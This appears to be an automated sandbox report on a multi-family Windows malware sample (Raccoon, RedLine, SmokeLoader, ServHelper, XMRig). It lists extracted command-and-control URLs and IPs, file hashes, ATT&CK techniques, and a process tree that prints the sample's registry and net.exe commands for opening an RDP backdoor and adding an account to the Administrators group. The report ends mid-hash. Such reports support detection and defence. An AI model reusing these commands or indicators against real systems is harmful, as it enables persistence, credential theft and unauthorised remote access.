raccoon | f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e

Analysis

max time kernel
151s
max time network
138s
platform
windows10_x64
resource
win10-en-20210920
submitted
12-10-2021 17:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
Size

175KB
MD5

741f960ae2f91ba7b632f472e1995d63
SHA1

afbd300aa5566ca3fa5ea56a5a236f5ec91cd5c3
SHA256

f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e
SHA512

2da69da4ee0f1627705b272dbe6d2599afa52ad0d87e0172cf832625a77ee9d7a899addab3925645b92cfd642d9a9d5dac8a69a200ebe0b2380cd7cb75cf90f7

Score

10^/10

raccoon redline servhelper smokeloader xmrig 676b1a32c7d2ce2aba84e8823871900d67e00049 8d179b9e611eee525425544ee8c6d77360ab7cd9 megaproliv newpro w1 backdoor collection discovery infostealer miner persistence spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/

rc4.i32

Extracted

Family

raccoon

Version

1.8.2

Botnet

676b1a32c7d2ce2aba84e8823871900d67e00049

Attributes

url4cnc
http://telemirror.top/kaba4ello

http://tgmirror.top/kaba4ello

http://telegatt.top/kaba4ello

http://telegka.top/kaba4ello

http://telegin.top/kaba4ello

https://t.me/kaba4ello

rc4.plain

Extracted

Family

redline

Botnet

109.234.34.165:12323

Extracted

Family

raccoon

Version

1.8.2

Botnet

8d179b9e611eee525425544ee8c6d77360ab7cd9

Attributes

url4cnc
http://teletop.top/agrybirdsgamerept

http://teleta.top/agrybirdsgamerept

https://t.me/agrybirdsgamerept

rc4.plain

Extracted

Family

redline

Botnet

MegaProliv

93.115.20.139:28978

Extracted

Family

redline

Botnet

Newpro

139.99.118.252:12517

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2748-132-0x0000000000740000-0x0000000000771000-memory.dmp	family_redline
behavioral1/memory/2748-137-0x00000000008B0000-0x00000000008CC000-memory.dmp	family_redline
behavioral1/memory/2928-167-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/2928-168-0x000000000041B25E-mapping.dmp	family_redline
behavioral1/memory/2280-178-0x000000000F040000-0x000000000F07D000-memory.dmp	family_redline
behavioral1/memory/2280-181-0x000000000F0C0000-0x000000000F0FC000-memory.dmp	family_redline
behavioral1/memory/2928-201-0x0000000005270000-0x0000000005876000-memory.dmp	family_redline

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Downloads MZ/PE file

Executes dropped EXE 7 IoCs

Processes:

FC33.exe329.exeBA6.exe1C12.exe2606.exe3029.exe2606.exe

pid	Process
2864	FC33.exe
3644	329.exe
2748	BA6.exe
1192	1C12.exe
1480	2606.exe
2280	3029.exe
2928	2606.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Deletes itself 1 IoCs

Processes:

pid	Process
1588

Loads dropped DLL 5 IoCs

Processes:

FC33.exe

pid	Process
2864	FC33.exe
2864	FC33.exe
2864	FC33.exe
2864	FC33.exe
2864	FC33.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

FC33.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	FC33.exe

Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs

collection

Email Collection

T1114

Processes:

FC33.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook	FC33.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook	FC33.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	FC33.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook	FC33.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook	FC33.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook	FC33.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	FC33.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	FC33.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe2606.exe

description	pid	Process	procid_target
PID 2372 set thread context of 3564	2372	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe	69
PID 1480 set thread context of 2928	1480	2606.exe	77

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
1056	timeout.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1592	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe

pid	Process
3564	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
3564	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
1588

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid	Process
636

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe

pid	Process
3564	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

BA6.exe2606.exe3029.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeDebugPrivilege	2748	BA6.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeDebugPrivilege	2928	2606.exe
Token: SeDebugPrivilege	2280	3029.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid	Process
1588
1588

Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid	Process
1588
1588

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe2606.exe1C12.exepowershell.execsc.exenet.exe

description	pid	Process	procid_target
PID 2372 wrote to memory of 3564	2372	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe	69
PID 2372 wrote to memory of 3564	2372	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe	69
PID 2372 wrote to memory of 3564	2372	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe	69
PID 2372 wrote to memory of 3564	2372	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe	69
PID 2372 wrote to memory of 3564	2372	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe	69
PID 2372 wrote to memory of 3564	2372	f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe	69
PID 1588 wrote to memory of 2864	1588		71
PID 1588 wrote to memory of 2864	1588		71
PID 1588 wrote to memory of 2864	1588		71
PID 1588 wrote to memory of 3644	1588		72
PID 1588 wrote to memory of 3644	1588		72
PID 1588 wrote to memory of 3644	1588		72
PID 1588 wrote to memory of 2748	1588		73
PID 1588 wrote to memory of 2748	1588		73
PID 1588 wrote to memory of 2748	1588		73
PID 1588 wrote to memory of 1192	1588		74
PID 1588 wrote to memory of 1192	1588		74
PID 1588 wrote to memory of 1192	1588		74
PID 1588 wrote to memory of 1480	1588		75
PID 1588 wrote to memory of 1480	1588		75
PID 1588 wrote to memory of 1480	1588		75
PID 1480 wrote to memory of 2928	1480	2606.exe	77
PID 1480 wrote to memory of 2928	1480	2606.exe	77
PID 1480 wrote to memory of 2928	1480	2606.exe	77
PID 1588 wrote to memory of 2280	1588		78
PID 1588 wrote to memory of 2280	1588		78
PID 1588 wrote to memory of 2280	1588		78
PID 1480 wrote to memory of 2928	1480	2606.exe	77
PID 1480 wrote to memory of 2928	1480	2606.exe	77
PID 1480 wrote to memory of 2928	1480	2606.exe	77
PID 1480 wrote to memory of 2928	1480	2606.exe	77
PID 1480 wrote to memory of 2928	1480	2606.exe	77
PID 1192 wrote to memory of 3608	1192	1C12.exe	82
PID 1192 wrote to memory of 3608	1192	1C12.exe	82
PID 1192 wrote to memory of 3608	1192	1C12.exe	82
PID 3608 wrote to memory of 1836	3608	powershell.exe	85
PID 3608 wrote to memory of 1836	3608	powershell.exe	85
PID 3608 wrote to memory of 1836	3608	powershell.exe	85
PID 1836 wrote to memory of 616	1836	csc.exe	86
PID 1836 wrote to memory of 616	1836	csc.exe	86
PID 1836 wrote to memory of 616	1836	csc.exe	86
PID 3608 wrote to memory of 2212	3608	powershell.exe	87
PID 3608 wrote to memory of 2212	3608	powershell.exe	87
PID 3608 wrote to memory of 2212	3608	powershell.exe	87
PID 3608 wrote to memory of 2292	3608	powershell.exe	89
PID 3608 wrote to memory of 2292	3608	powershell.exe	89
PID 3608 wrote to memory of 2292	3608	powershell.exe	89
PID 3608 wrote to memory of 1124	3608	powershell.exe	91
PID 3608 wrote to memory of 1124	3608	powershell.exe	91
PID 3608 wrote to memory of 1124	3608	powershell.exe	91
PID 3608 wrote to memory of 2580	3608	powershell.exe	93
PID 3608 wrote to memory of 2580	3608	powershell.exe	93
PID 3608 wrote to memory of 2580	3608	powershell.exe	93
PID 3608 wrote to memory of 1592	3608	powershell.exe	94
PID 3608 wrote to memory of 1592	3608	powershell.exe	94
PID 3608 wrote to memory of 1592	3608	powershell.exe	94
PID 3608 wrote to memory of 1292	3608	powershell.exe	95
PID 3608 wrote to memory of 1292	3608	powershell.exe	95
PID 3608 wrote to memory of 1292	3608	powershell.exe	95
PID 3608 wrote to memory of 612	3608	powershell.exe	96
PID 3608 wrote to memory of 612	3608	powershell.exe	96
PID 3608 wrote to memory of 612	3608	powershell.exe	96
PID 612 wrote to memory of 2180	612	net.exe	97
PID 612 wrote to memory of 2180	612	net.exe	97

outlook_office_path 1 IoCs

Processes:

FC33.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook	FC33.exe

outlook_win_path 1 IoCs

Processes:

FC33.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	FC33.exe

C:\Users\Admin\AppData\Local\Temp\f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
"C:\Users\Admin\AppData\Local\Temp\f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Users\Admin\AppData\Local\Temp\f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
  "C:\Users\Admin\AppData\Local\Temp\f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3564

C:\Users\Admin\AppData\Local\Temp\FC33.exe
C:\Users\Admin\AppData\Local\Temp\FC33.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\FC33.exe"
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:1056

C:\Users\Admin\AppData\Local\Temp\329.exe
C:\Users\Admin\AppData\Local\Temp\329.exe
1⤵
- Executes dropped EXE
PID:3644

C:\Users\Admin\AppData\Local\Temp\BA6.exe
C:\Users\Admin\AppData\Local\Temp\BA6.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Users\Admin\AppData\Local\Temp\1C12.exe
C:\Users\Admin\AppData\Local\Temp\1C12.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i2xhgsw3\i2xhgsw3.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1836
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7088.tmp" "c:\Users\Admin\AppData\Local\Temp\i2xhgsw3\CSCC7A74A6CCD2147D9B5306EC3A5757ECE.TMP"
      4⤵
      PID:616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:612
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    PID:2184
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start rdpdr
      4⤵
      PID:428
    - - C:\Windows\SysWOW64\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2416
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:424
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:1788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:4052
    - - C:\Windows\SysWOW64\net.exe
        
        net start TermService
        5⤵
        
        PID:3068
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4064
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3976

C:\Users\Admin\AppData\Local\Temp\2606.exe
C:\Users\Admin\AppData\Local\Temp\2606.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Users\Admin\AppData\Local\Temp\2606.exe
  C:\Users\Admin\AppData\Local\Temp\2606.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2928

C:\Users\Admin\AppData\Local\Temp\3029.exe
C:\Users\Admin\AppData\Local\Temp\3029.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2280

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2606.exe.log

MD5
41fbed686f5700fc29aaccf83e8ba7fd

SHA1
5271bc29538f11e42a3b600c8dc727186e912456

SHA256
df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

SHA512
234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
f3068198b62b4b70404ec46694d632be

SHA1
7b0b31ae227cf2a78cb751573a9d07f755104ea0

SHA256
bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8

SHA512
ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795

Download Submit
C:\Users\Admin\AppData\Local\Temp\1C12.exe

MD5
2686d02fd6a82432c2bbfccdf7f334de

SHA1
75c80a6877c6e0724d19de0f5149bed186760e27

SHA256
35270b20b568beb5f844e1b8c9bfe53498cfbac02633a9cb3ca5927a2cba4e4d

SHA512
22333918e2fed9e39c967313f77844b6bc4f3a2dbfe97223c08def7b80057b7c89f5b75460575172e99c11ee2b824c66e4417588a12ae6a314968c2a34d01698

Download Submit
C:\Users\Admin\AppData\Local\Temp\1C12.exe

MD5
2686d02fd6a82432c2bbfccdf7f334de

SHA1
75c80a6877c6e0724d19de0f5149bed186760e27

SHA256
35270b20b568beb5f844e1b8c9bfe53498cfbac02633a9cb3ca5927a2cba4e4d

SHA512
22333918e2fed9e39c967313f77844b6bc4f3a2dbfe97223c08def7b80057b7c89f5b75460575172e99c11ee2b824c66e4417588a12ae6a314968c2a34d01698

Download Submit
C:\Users\Admin\AppData\Local\Temp\2606.exe

MD5
3de1b117e92c82530bb90a01b5d5d51e

SHA1
8aec1842e379c1c6d9be27e5f144f037fed18432

SHA256
789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

SHA512
ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

Download Submit
C:\Users\Admin\AppData\Local\Temp\2606.exe

MD5
3de1b117e92c82530bb90a01b5d5d51e

SHA1
8aec1842e379c1c6d9be27e5f144f037fed18432

SHA256
789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

SHA512
ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

Download Submit
C:\Users\Admin\AppData\Local\Temp\2606.exe

MD5
3de1b117e92c82530bb90a01b5d5d51e

SHA1
8aec1842e379c1c6d9be27e5f144f037fed18432

SHA256
789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

SHA512
ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

Download Submit
C:\Users\Admin\AppData\Local\Temp\3029.exe

MD5
5a79659f43aeee5f46d0537054422948

SHA1
8bbd07f91bcbf9ac6bd940726215d0c6809ccb31

SHA256
b084e1e1eb26a99f9b9185fa7e288dc68967601a5c9703a5f16ef12ebc37e689

SHA512
632f12fa66437b6e05fe899442a76c9088f3d8ddc9e9517169a73e032be110531b9cb4a3086429c3ccfe9ca0615f813d2a5da616a6597db48426f3dc29bc7647

Download Submit
C:\Users\Admin\AppData\Local\Temp\3029.exe

MD5
5a79659f43aeee5f46d0537054422948

SHA1
8bbd07f91bcbf9ac6bd940726215d0c6809ccb31

SHA256
b084e1e1eb26a99f9b9185fa7e288dc68967601a5c9703a5f16ef12ebc37e689

SHA512
632f12fa66437b6e05fe899442a76c9088f3d8ddc9e9517169a73e032be110531b9cb4a3086429c3ccfe9ca0615f813d2a5da616a6597db48426f3dc29bc7647

Download Submit
C:\Users\Admin\AppData\Local\Temp\329.exe

MD5
8fc2fdb5f32e0f31a5f4b7d27444d40f

SHA1
893eabd6406deb4ca5101c48c897811d494f9d6c

SHA256
17a6dc5a1ce81c1ebc7c4d71e261d70ba56ee8db6e36a341c8f637ccd89f2e5e

SHA512
973d122a4801b34643ea797dbce8d77081e27ae8bf23e91bc111cd42b2b45c5344bd332b936f4fef4f6be1c0e40846eff4d93886de48e3501e1e18096648e5f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\329.exe

MD5
8fc2fdb5f32e0f31a5f4b7d27444d40f

SHA1
893eabd6406deb4ca5101c48c897811d494f9d6c

SHA256
17a6dc5a1ce81c1ebc7c4d71e261d70ba56ee8db6e36a341c8f637ccd89f2e5e

SHA512
973d122a4801b34643ea797dbce8d77081e27ae8bf23e91bc111cd42b2b45c5344bd332b936f4fef4f6be1c0e40846eff4d93886de48e3501e1e18096648e5f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\BA6.exe

MD5
f5c4d463115dc020d5ec1756da0258a0

SHA1
b66eb6992d7c0191d1255ae0ada35b6403221425

SHA256
fa0bcd10cdc9df5fe9806e16a933d71d49c93fb6b21e75e2215bb728212b570e

SHA512
854bbe52abf339b75e68c20aef0b905fb29c4c2580a44b957b6d6b02889b78a44f6605a2e45f61f358b7b63d3530b61f6bad513f0672bcef06268d9ea1c55350

Download Submit
C:\Users\Admin\AppData\Local\Temp\BA6.exe

MD5
f5c4d463115dc020d5ec1756da0258a0

SHA1
b66eb6992d7c0191d1255ae0ada35b6403221425

SHA256
fa0bcd10cdc9df5fe9806e16a933d71d49c93fb6b21e75e2215bb728212b570e

SHA512
854bbe52abf339b75e68c20aef0b905fb29c4c2580a44b957b6d6b02889b78a44f6605a2e45f61f358b7b63d3530b61f6bad513f0672bcef06268d9ea1c55350

Download Submit
C:\Users\Admin\AppData\Local\Temp\FC33.exe

MD5
304fc140f23e50e1ca9c753d7ead32c6

SHA1
55db5552e5ac7a0e6ced8cd7e1ad2af2e3bf089e

SHA256
62b627269aeb306a6c25c7b118ede17354d0191b7a3ae1abbe44a7869239e9ae

SHA512
b13b8ed9ec826dd5d9ab4ae67d407556e08a1a11330e8320bf513b01ef3e710a3259874085009ad92002a999d8618c77054eeb31803e28b2bda3a97066e77e22

Download Submit
C:\Users\Admin\AppData\Local\Temp\FC33.exe

MD5
304fc140f23e50e1ca9c753d7ead32c6

SHA1
55db5552e5ac7a0e6ced8cd7e1ad2af2e3bf089e

SHA256
62b627269aeb306a6c25c7b118ede17354d0191b7a3ae1abbe44a7869239e9ae

SHA512
